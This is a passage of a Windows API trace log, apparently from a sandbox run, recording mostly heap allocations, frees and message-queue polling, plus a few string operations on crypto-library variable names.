(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0178.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0178.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0178.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x3ee3020 [0178.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0178.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0178.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0178.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0178.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0178.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0178.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0178.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0178.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0178.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54df8 [0178.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0178.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0178.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0178.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0178.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0178.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0178.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0178.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0178.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0178.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x3fe0020 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0178.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0178.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0178.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0178.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0178.763] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0178.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0178.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0178.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0178.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0178.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0178.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0178.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0178.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0178.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0178.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0178.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0178.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0178.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0178.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0178.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0178.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0178.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0178.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0178.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0178.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0178.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0178.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0178.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0178.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0178.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0178.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0178.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0178.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0178.766] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0178.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0178.766] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0178.766] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0178.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0178.766] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0178.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0178.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0178.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0178.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0178.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0178.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0178.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0178.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0178.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0178.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0178.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0178.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0178.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0178.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0178.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0178.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0178.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0178.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0178.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0178.768] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0178.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0178.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0178.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0178.768] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0178.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0178.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0178.768] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0178.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0178.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0178.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0178.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0178.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0178.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0178.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0178.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0178.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0178.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0178.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0178.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0178.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0178.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0178.769] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0178.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0178.769] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0178.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0178.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0178.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0178.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0178.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0178.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0178.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0178.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0178.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0178.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0178.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0178.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0178.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0178.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0178.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0178.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0178.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0178.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0178.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0178.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0178.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0178.771] 